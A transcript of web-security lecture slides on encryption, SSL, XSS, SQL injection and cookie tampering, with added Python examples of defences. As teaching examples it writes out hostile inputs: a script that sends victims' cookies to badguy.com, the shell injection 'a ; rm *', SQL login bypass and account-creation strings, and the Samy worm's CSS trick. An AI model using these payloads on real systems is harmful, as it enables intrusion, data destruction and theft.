CS6320 – Web Security
L. Grewe
Modified from http://crypto.stanford.edu/cs155/

Date posted: 22-Dec-2015

Transcript of CS6320 – Web Security

Page 1: CS6320 – Web Security

L. Grewe

Modified from http://crypto.stanford.edu/cs155/

Page 2: Issues

• Authentication, authorization
• Protecting your system against hackers
• Controlling access to critical data
• Control inbound versus outbound traffic
• Security versus accessibility tradeoffs
• Security versus capability tradeoffs
• Multi-tier versus single-tier solutions
• Security versus expense tradeoffs
• Security and capability versus administrative overhead and complexity

Page 3: Solutions

• Software-based
• Hardware-based
• Freeware versus commercial products
• Use of security protocols
• Cryptography: converting messages to unreadable forms... and back
• Steganography: hiding the existence of a message

Page 4: One issue… buffer overflow… things getting better

[Chart: number of vulnerabilities per year, 2001–2006, Web (XSS) versus Buffer Overflow. Source: MITRE CVE trends]

Majority of vulnerabilities now found in web software

Page 5: Example Web Site architecture with Security Components

[Diagram of components: Intrusion Detection System, Application Firewall (WAF), Firewall, Load Balancer, web servers WS1 / WS2 / WS3, a second Firewall, Authorization, App Servers, DB]

Page 6: Attacks on systems

Common web-site attacks:

• Denial of Service
• Attack the web server (IIS, Apache): e.g. control hijacking: CodeRed, Nimda, …

Solutions:

• Harden the web server: StackGuard, libsafe, …
• Worm defense: host-based intrusion detection, worm signature generation, shields

Page 7: Firewalls

• A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or in a combination of both.

IP filtering (packet filtering)
• Controls access solely by looking at information contained in the IP header of data packets being sent to the server.

Proxy servers / application firewalls

Page 8: Web Application Firewalls

• Prevent some attacks such as:
  • SQL injection
  • Form field tampering
  • Cookie poisoning

Some examples:
• Imperva
• Kavado InterDo
• F5 TrafficShield
• Citrix NetScaler
• CheckPoint Web Intelligence

Page 9: Message/Information Hiding

Protect some information being sent from client to server and vice versa.

Through encryption. Some protocols, such as SSL (secure socket layer), use encryption to perform a "secure" exchange of information.

Page 10: Encryption

Convert normal, readable data into obscured, unreadable data

Hi There!! → Encryption Algorithm → m/okuGlilkdskuch
Hi There!! → Encryption Algorithm → alieka;wk12938*

Page 11: Decryption

Convert obscured, unreadable data into normal, readable data

m/okuGlilkdskuch → Decryption Algorithm → Hi There!!
alieka;wk12938* → Decryption Algorithm → Hi There!!

Page 12: Terminology

plaintext - clear, readable text
ciphertext - unreadable text
cipher - algorithm(s) for encryption and decryption

Hi There!! → Encryption Algorithm → alieka;wk12938*
alieka;wk12938* → Decryption Algorithm → Hi There!!

Page 13: Terminology

Key - a secret piece of information that controls how the encryption algorithm works

Different keys produce different encrypted results

Hi There!! → Encryption Algorithm (Key: "Citizen Kane") → 109291ala;dfwij?
Hi There!! → Encryption Algorithm (Key: "Citizen Kano") → 398jfasd;k2//ad?

Page 14: Symmetric Key Technology

Alice wants to send a private/confidential message to Bob

• Alice computes c = crypt(message, key)
• Sends c to Bob over an unsecured wire
• Bob computes message = crypt(c, key)

Page 15: Symmetric Key Application

Password login: Alice sends her password to the computer to prove her identity (authenticity)

Problem: sniffing
Solution: challenge/response
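The challenge/response fix from this slide, worked through as an added example (not from the slides): the shared key never crosses the wire; the server sends a random nonce and Alice answers with HMAC(key, nonce), so a sniffer who captures the exchange cannot reuse it. HMAC-SHA256, the fixed demo key and the one-use nonce set are my assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Set

# Constructed shared secret: the symmetric key Alice and the computer both hold.
# A real deployment derives it from the password with a password hash.
SHARED_KEY = b"citizen-kane-shared-secret"


class Server:
    """The computer Alice logs in to. It never receives the key over the wire."""

    def __init__(self, key: bytes) -> None:
        self._key = key
        self._outstanding: Set[bytes] = set()   # challenges issued, not yet answered

    def challenge(self) -> bytes:
        """Step 1: send a fresh random nonce. A sniffer may see it; that is fine."""
        nonce = secrets.token_bytes(16)
        self._outstanding.add(nonce)
        return nonce

    def verify(self, nonce: bytes, response: bytes) -> bool:
        """Step 3: recompute HMAC(key, nonce) and compare in constant time.
        Each nonce is accepted once, so a sniffed response cannot be replayed."""
        if nonce not in self._outstanding:
            return False
        self._outstanding.discard(nonce)
        expected = hmac.new(self._key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def client_response(key: bytes, nonce: bytes) -> bytes:
    """Step 2: Alice proves she knows the key without ever sending it."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def honest_login(server: Server) -> bool:
    nonce = server.challenge()
    return server.verify(nonce, client_response(SHARED_KEY, nonce))


def replayed_login(server: Server) -> bool:
    """Eve captured one (nonce, response) pair and resends it after Alice used it."""
    nonce = server.challenge()
    response = client_response(SHARED_KEY, nonce)
    assert server.verify(nonce, response)      # Alice's genuine login succeeds
    return server.verify(nonce, response)      # the replay is rejected


def wrong_key_login(server: Server) -> bool:
    nonce = server.challenge()
    return server.verify(nonce, client_response(b"citizen-kano", nonce))


if __name__ == "__main__":
    s = Server(SHARED_KEY)
    print("honest:", honest_login(s))        # True
    print("replay:", replayed_login(s))      # False
    print("wrong key:", wrong_key_login(s))  # False
```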

Page 16: Shared Secret Key

A shared secret is great... but how do we distribute it?

Page 17: Asymmetric Key Cryptography

Instead of one key, have two:
• public key
• private key

The public key is known to everyone; the private (secret) key is known only to the recipient of the message.

When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it.

Computing the private key from the public key is very, very difficult (factoring a huge number)

Page 18: Asymmetric Encryption Example

• John: finds Jane.pub (public key) on her website (or she gives it to John in an email)
• John: computes c = crypt(message, Jane.pub)
• John: sends c to Jane over an unsecured wire
• Jane: computes message = crypt(c, Jane.priv)

Page 19: Advantages

Key distribution is not a problem! Anyone can send a message to Jane. Only Jane can decrypt!

Page 20: Asymmetric Encryption for Authentication

Alice wants to tell Bob the message is really from her!

Digital signature:
• Alice computes c = crypt(message, Alice.priv)
• Alice sends c over an unsecured wire
• Anyone can check that Alice is the sender... by computing message = crypt(c, Alice.pub)

Pages 21–26: Authenticity + Secrecy (one diagram built up over six slides)

Alice (holds A.priv; A.pub, B.pub, ... are known to everyone) wants to send "I LUV U" to Bob (holds B.priv). Carl & Eve (bad people!) are on the wire.

• Secrecy: the message is encrypted with B.pub, so only Bob can decrypt it.
• Authenticity: "This is from A" is signed with A.priv, so Bob can check it with A.pub.

Page 27: Another Solution: Digital Certificates

Certificate Authority (CA): publishes that a particular identity goes with a particular public key

Alice gets a certificate (identity <=> public key), signed by the CA

So if you trust the CA, then you can trust the public key

Page 28: SSL… the idea

• Jane connects to John's server
• John's server returns a certificate (signed by VeriSign), plus something encrypted with John.priv
• Jane can verify that the certificate is valid
• Uses the public key to decrypt the token
• John is authenticated
• Jane makes a one-time session key k
• Encrypts k with John's public key, sends it to John
• Now they can use symmetric key cryptography

Page 29: Attacks…

There are many kinds of attacks that hackers have done.

Will mention some more weaknesses here… but take a class on security, cryptography, etc. to get into more details.

Page 30: Attack: Denial of Service

• Make the service unavailable
• Flood of incoming traffic
• Use a robot to launch DoS on the server
• Hard to trace the identity of the attacker

Distributed DoS (DDoS)
• Take over many machines, launch the attack simultaneously from many locations

Page 31: Attack: Buffer Overflow

• Bad guy sends a huge, over-sized request to a naïvely implemented (aka buggy) program, overflowing the input buffer
• May overwrite data in memory and/or program code
• May overwrite the return address on the stack of a C program, so that the procedure call returns somewhere else

Page 32: How To Avoid Buffer Overflow

• Write code carefully
• Limit input size; read in small chunks as opposed to reading in the whole input
• Use better languages (e.g. Java)

Page 33: Another Problem >>>>> What about all of the web application code???

Runs on the web server or app server.
• Takes input from web users (via the web server)
• Interacts with the database and 3rd parties
• Prepares results for users (via the web server)

Examples:
• Shopping carts, home banking, bill pay, tax prep, …
• New code written for every web site

Written in:
• C, PHP, Perl, Python, JSP, ASP, …
• Often written with little consideration for security

Page 34: Web Application problems

Inadequate validation of user input
• Cross site scripting
• SQL injection
• HTTP splitting

Broken session management
• Can lead to session hijacking and data theft

Insecure storage
• Sensitive data stored in the clear
• Prime target for theft – e.g. Egghead, Verizon
• Note: PCI Data Security Standard (Visa, Mastercard)

Page 35: A simple example

Direct use of user input:

http://victim.com/copy.php?name=username
(script name: copy.php; script input: name=username)

copy.php:

system("cp temp.dat $name.dat")

Problem: http://victim.com/copy.php?name="a ; rm *"
(should be: name=a%20;%20rm%20*)
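What goes wrong in copy.php, and the two defences a reviewer would ask for, as an added example (not from the slides): a shell sees the spliced name as several words, so the hardened version allowlists the name and passes it as one argv element to a process started without a shell. The allowlist pattern and the argv form are my assumptions.

```python
import re
import shlex
from typing import List

# Constructed values of the ?name= parameter from the slide
GOOD_NAME = "username"
BAD_NAME = "a ; rm *"

# Allowlist: the only shape of name the application actually expects.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def build_command_unsafe(name: str) -> str:
    """Mirrors the slide's system("cp temp.dat $name.dat"): the parameter is
    interpolated into a command line that a shell will parse. Never executed here."""
    return f"cp temp.dat {name}.dat"


def shell_tokens(cmd: str) -> List[str]:
    """The words a POSIX shell would see for that command line."""
    return shlex.split(cmd)


def validate_name(name: str) -> str:
    """Reject anything outside the allowlist before it reaches any command."""
    if NAME_RE.fullmatch(name) is None:
        raise ValueError(f"rejected name: {name!r}")
    return name


def build_argv_safe(name: str) -> List[str]:
    """Hardened version: the validated name becomes one argv element, to be run as
    subprocess.run(argv) with no shell, so ';' and '*' can never act as syntax."""
    return ["cp", "temp.dat", f"{validate_name(name)}.dat"]


def is_rejected(name: str) -> bool:
    try:
        validate_name(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(shell_tokens(build_command_unsafe(BAD_NAME)))   # 'rm' shows up as its own command word
    print(build_argv_safe(GOOD_NAME))
    print(is_rejected(BAD_NAME))
```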

Page 36: Redirects

EZShopper.com shopping cart (10/2004):

http://…/cgi-bin/loadpage.cgi?page=url
• Redirects the browser to url

Redirects are common on many sites
• Used to track when a user clicks on an external link
• EZShopper uses the redirect to add HTTP headers

Problem: phishing

http://victim.com/cgi-bin/loadpage?page=phisher.com
• A link to victim.com puts the user at phisher.com

Local redirects should ensure the target URL is local
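A check for that last point, as an added example (not from the slides), assuming the site is http://victim.com as on the slide: it goes beyond the bare host case and also rejects scheme-relative, backslash and non-http targets, and CR/LF that would enable the HTTP splitting mentioned earlier.

```python
from urllib.parse import urljoin, urlsplit

SITE = "http://victim.com"   # the site hosting loadpage.cgi (from the slide)


def is_local_redirect(target: str) -> bool:
    """True only if 'target' stays on this site.
    Rejects: absolute URLs on another host, scheme-relative '//host' forms,
    backslash variants that browsers normalise to '/', non-http schemes such as
    javascript:, bare relative paths, and CR/LF (header injection)."""
    if not target or any(c in target for c in "\r\n"):
        return False
    cleaned = target.replace("\\", "/")
    parts = urlsplit(cleaned)
    if parts.scheme or parts.netloc:
        return False            # absolute or scheme-relative: off-site
    if not cleaned.startswith("/") or cleaned.startswith("//"):
        return False            # relative path, or //host after cleaning
    return True


def resolve_redirect(page: str, fallback: str = "/") -> str:
    """What loadpage.cgi should do: honour the target only if local, else fall back."""
    return urljoin(SITE, page if is_local_redirect(page) else fallback)


if __name__ == "__main__":
    for p in ["/cart", "phisher.com", "//phisher.com", "http://phisher.com"]:
        print(p, "->", resolve_redirect(p))
```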

Page 37: Cross Site Scripting (XSS)

Page 38: The setup

User input is echoed into the HTML response.

Example: search field

• http://victim.com/search.php?term=apple
• search.php responds with:

<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>

Is this exploitable?

Page 39: Answer….. Bad input

Problem: no validation of the input term

Consider the link (properly URL encoded):

http://victim.com/search.php?term=
  <script> window.open("http://badguy.com?cookie=" + document.cookie) </script>

What if the user clicks on this link?

1. Browser goes to victim.com/search.php
2. victim.com returns
   <HTML> Results for <script> … </script>
3. Browser executes the script: sends badguy.com the cookie for victim.com

Page 40: What is the problem?

Why would a user click on such a link?
• Phishing email in a webmail client (e.g. Gmail)
• Link in a DoubleClick banner ad
• … many, many ways to fool a user into clicking

What if badguy.com gets the cookie for victim.com?
• The cookie can include session auth for victim.com
• Or other data intended only for victim.com

Violates the same origin policy

Page 41: Worse …

Attacker can execute arbitrary scripts in the browser

Can manipulate any DOM component on victim.com
• Control links on the page
• Control form fields (e.g. password field) on this page and linked pages.
  Example: inject a password field that sends the password to the bad guy.

Can infect other users: MySpace.com worm.

Page 42: MySpace.com (Samy worm)

Users can post HTML on their pages
• MySpace.com ensures the HTML contains no <script>, <body>, onclick, <a href=javascript://>
• … but can do JavaScript within CSS tags:
  <div style="background:url('javascript:alert(1)')">
  And can hide "javascript" as "java\nscript"

With careful JavaScript hacking:
• Samy's worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.
• Samy had millions of friends within 24 hours.

More info: http://namb.la/popular/tech.html

Page 43: Avoiding XSS bugs (PHP)

Main problem:
• Input checking is difficult --- many ways to inject scripts into HTML.

Preprocess input from the user before echoing it

PHP: htmlspecialchars(string)

  &  →  &amp;
  "  →  &quot;
  '  →  &#039;
  <  →  &lt;
  >  →  &gt;

• htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
  Outputs: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
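The search.php page from slides 38–39 rendered both ways, as an added example (not from the slides): a small re-implementation of PHP's htmlspecialchars with ENT_QUOTES (the five replacements in the table above, my own code) is applied to the term before it is echoed, and the slide's cookie-stealing link comes out as inert text.

```python
from typing import List, Tuple

# Constructed request values for search.php's ?term=
BENIGN_TERM = "apple"
# The slide's attack link, URL-decoded as search.php would receive it
BAD_TERM = '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>'

# Same replacements as PHP htmlspecialchars($s, ENT_QUOTES); '&' must go first so
# the entities produced by later replacements are not re-encoded.
_HTML_SPECIAL: List[Tuple[str, str]] = [
    ("&", "&amp;"), ('"', "&quot;"), ("'", "&#039;"), ("<", "&lt;"), (">", "&gt;"),
]


def htmlspecialchars(s: str) -> str:
    for raw, ent in _HTML_SPECIAL:
        s = s.replace(raw, ent)
    return s


def search_page_unsafe(term: str) -> str:
    """The slide's search.php: the term is echoed straight into the HTML."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {term} : ...</BODY></HTML>")


def search_page_safe(term: str) -> str:
    """Same page with the input preprocessed before echoing."""
    return search_page_unsafe(htmlspecialchars(term))


def contains_script_tag(html: str) -> bool:
    """Crude check over rendered output: is there a live <script> element?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(search_page_unsafe(BAD_TERM))   # script tag survives
    print(search_page_safe(BAD_TERM))     # &lt;script&gt; ... shown as text
```

This covers the HTML text context the slide shows; a value echoed into an unquoted attribute or inside a <script> block needs escaping for that context instead.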

Page 44: httpOnly Cookies (IE)

Browser → Server: GET …
Server → Browser: HTTP header: Set-Cookie: NAME=VALUE; HttpOnly

• Cookie sent over HTTP(S), but not accessible to scripts
• Cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• … but does not stop most other risks of XSS bugs.

Page 45: SQL Injection

Page 46: The setup

User input is used in a SQL query

Example: login page (in ASP)

set ok = execute("SELECT * FROM UserTable WHERE username=' " & form("user") & " ' AND password=' " & form("pwd") & " ' ");
If not ok.EOF
    login success
else fail;

Is this a problem?

Page 47: The problem….. Bad input

Suppose user = " ' or 1 = 1 -- " (URL encoded)

Then the script does:

ok = execute( SELECT … WHERE username= ' ' or 1=1 -- … )

• The "--" causes the rest of the line to be ignored.
• Now ok.EOF is always false.

The bad news: easy login to many sites this way.

Page 48: Worse…

Suppose user =
  ' exec cmdshell 'net user badguy badpwd' / ADD --

Then the script does:

ok = execute( SELECT … WHERE username= ' ' exec … )

If the SQL server context runs as "sa", the attacker gets an account on the DB server.

Page 49: Avoiding SQL injection

Build SQL queries by properly escaping args: ' → \'

Example: Parameterized SQL (ASP.NET 1.1)
• Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(
    "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
    dbConnection);
cmd.Parameters.Add("@User", Request["user"]);
cmd.Parameters.Add("@Pwd", Request["pwd"]);
cmd.ExecuteReader();

In PHP: bound parameters -- similar function
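The login from slides 46–49 run against a real database, as an added example (not from the slides): the concatenated query from the ASP page beside its parameterized form, with the slide's ' or 1=1 -- input fed to both. SQLite via Python's sqlite3 stands in for the SQL Server in the slides; the table contents are constructed.

```python
import sqlite3
from typing import Dict

# Constructed stand-in for the slide's UserTable. Passwords are stored in the
# clear only to mirror the slide; real code stores a salted password hash.
USERS = [("alice", "secret"), ("bob", "hunter2")]

# The slide's bad input, as form("user") would receive it after URL decoding
INJECTED_USER = "' or 1=1 --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO UserTable VALUES (?, ?)", USERS)
    return conn


def build_query_unsafe(user: str, pwd: str) -> str:
    """The ASP slide's string concatenation, reproduced so the resulting SQL is visible."""
    return ("SELECT * FROM UserTable WHERE username='" + user
            + "' AND password='" + pwd + "'")


def login_unsafe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """'If not ok.EOF': success means the query returned at least one row."""
    return conn.execute(build_query_unsafe(user, pwd)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Parameterized query (the ASP.NET @User/@Pwd idea): the driver binds the
    values, so a quote or '--' inside them is data, never SQL syntax."""
    row = conn.execute(
        "SELECT * FROM UserTable WHERE username=? AND password=?", (user, pwd)
    ).fetchone()
    return row is not None


def run_demo() -> Dict[str, bool]:
    conn = make_db()
    return {
        "valid_safe": login_safe(conn, "alice", "secret"),
        "wrong_pwd_safe": login_safe(conn, "alice", "wrong"),
        "injected_unsafe": login_unsafe(conn, INJECTED_USER, "anything"),
        "injected_safe": login_safe(conn, INJECTED_USER, "anything"),
    }


if __name__ == "__main__":
    print(build_query_unsafe(INJECTED_USER, "anything"))  # the '--' comments out the password check
    print(run_demo())
```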

Page 50: App code

A little programming knowledge can be dangerous:
• Cross site scripting
• SQL injection
• HTTP splitting

What to do?
• Band-aid: Web App Firewall (WAF)
  Looks for attack patterns and blocks requests
  False positives / false negatives
• Code checking

Page 51: Code checking

Blackbox security testing services:
• Whitehatsec.com

Automated blackbox testing tools:
• Cenzic, Hailstorm
• SPI Dynamics, WebInspect
• eEye, Retina

Web application hardening tools:
• WebSSARI [WWW'04]: based on information flow
• Nguyen-Tuong [IFIP'05]: based on tainting

Page 52: Session Management

Cookies, hidden fields, and user authentication

Page 53: Cookie risks

Danger of storing data on the browser
• User can change values

Silly example: shopping cart software.

Set-Cookie: shopping-cart-total = 150 ($)

• User edits the cookie file (cookie poisoning):

Cookie: shopping-cart-total = 15 ($)

• … bargain shopping.

Similar behavior with hidden fields:

<INPUT TYPE="hidden" NAME=price VALUE="150">

Page 54: Not so silly … some real sites had this issue

• D3.COM Pty Ltd: ShopFactory 5.8
• @Retail Corporation: @Retail
• Adgrafix: Check It Out
• Baron Consulting Group: WebSite Tool
• ComCity Corporation: SalesCart
• Crested Butte Software: EasyCart
• Dansie.net: Dansie Shopping Cart
• Intelligent Vending Systems: Intellivend
• Make-a-Store: Make-a-Store OrderPage
• McMurtrey/Whitaker & Associates: Cart32 3.0
• [email protected]: CartMan 1.04
• Rich Media Technologies: JustAddCommerce 5.0
• SmartCart: SmartCart
• Web Express: Shoptron 1.2

Page 55: Solution

When storing state on the browser, MAC the data using a server secret key.

.NET 2.0:
• System.Web.Configuration.MachineKey
  Secret web server key intended for cookie protection
• HttpCookie cookie = new HttpCookie(name, val);
  HttpCookie encodedCookie = HttpSecureCookie.Encode(cookie);
• HttpSecureCookie.Decode(cookie);
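The MAC-the-cookie solution above, with the shopping-cart edit from slide 53 and the HttpOnly attribute from slide 44, as an added example (not from the slides and not .NET's HttpSecureCookie): the server keeps a secret key, appends HMAC-SHA256(key, name=value) to each cookie it sets, and on the way back accepts the value only if the tag verifies. The "value|tag" layout, binding the cookie name into the tag, and the Secure attribute are my choices.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Constructed server secret, the stand-in for .NET's MachineKey: generated once
# on the server, never sent to the browser.
SERVER_KEY = secrets.token_bytes(32)


def _tag(key: bytes, name: str, value: str) -> str:
    # The cookie name is part of the MAC input, so a tag minted for one cookie
    # cannot be moved onto a different cookie with the same value.
    return hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()


def encode_cookie(key: bytes, name: str, value: str) -> str:
    """Like HttpSecureCookie.Encode: the value still travels in the clear (a MAC
    gives integrity, not secrecy) but carries a tag only the server can compute."""
    return f"{value}|{_tag(key, name, value)}"


def decode_cookie(key: bytes, name: str, encoded: str) -> Optional[str]:
    """Like HttpSecureCookie.Decode: return the value only if its tag verifies."""
    value, sep, tag = encoded.rpartition("|")
    if not sep:
        return None
    expected = _tag(key, name, value)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return value


def set_cookie_header(name: str, encoded: str) -> str:
    """Set-Cookie line as on the httpOnly slide; Secure (not on the slide) keeps
    the cookie off plain-HTTP requests as well."""
    return f"Set-Cookie: {name}={encoded}; HttpOnly; Secure; Path=/"


def cart_total_after_tamper(key: bytes) -> Tuple[Optional[str], Optional[str]]:
    """The shopping-cart slide: the server issues 150; the user edits the cookie
    file to 15 but cannot produce a matching tag, so the server rejects it."""
    name = "shopping-cart-total"
    issued = encode_cookie(key, name, "150")
    tampered = "15|" + issued.split("|", 1)[1]   # value changed, old tag kept
    return decode_cookie(key, name, issued), decode_cookie(key, name, tampered)


if __name__ == "__main__":
    print(set_cookie_header("shopping-cart-total", encode_cookie(SERVER_KEY, "shopping-cart-total", "150")))
    print(cart_total_after_tamper(SERVER_KEY))   # ('150', None)
```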

Page 56: Cookie authentication

(Parties: Browser, Web Server, Auth server)

1. Browser → Web Server: POST login.cgi (username & pwd)
2. Web Server → Auth server: validate user
3. Auth server → Web Server: auth=val (Auth server stores val)
4. Web Server → Browser: Set-Cookie: auth=val
5. Browser → Web Server: GET restricted.html, Cookie: auth=val
6. Web Server → Auth server: auth=val (check val)
7. Auth server → Web Server: YES/NO
8. Web Server → Browser: if YES, restricted.html

Page 57: Weak authenticators: security risk

Predictable cookie authenticator
• Verizon Wireless - counter
• A valid user logs in, gets the counter, can view sessions of other users.

Weak authenticator generation: [Fu et al. '01]
• WSJ.com: cookie = {user, MAC_k(user)}
• Weak MAC exposes k from a few cookies.

Apache Tomcat: generateSessionID()
• MD5(PRNG) … but weak PRNG [GM'05].
• Predictable SessionIDs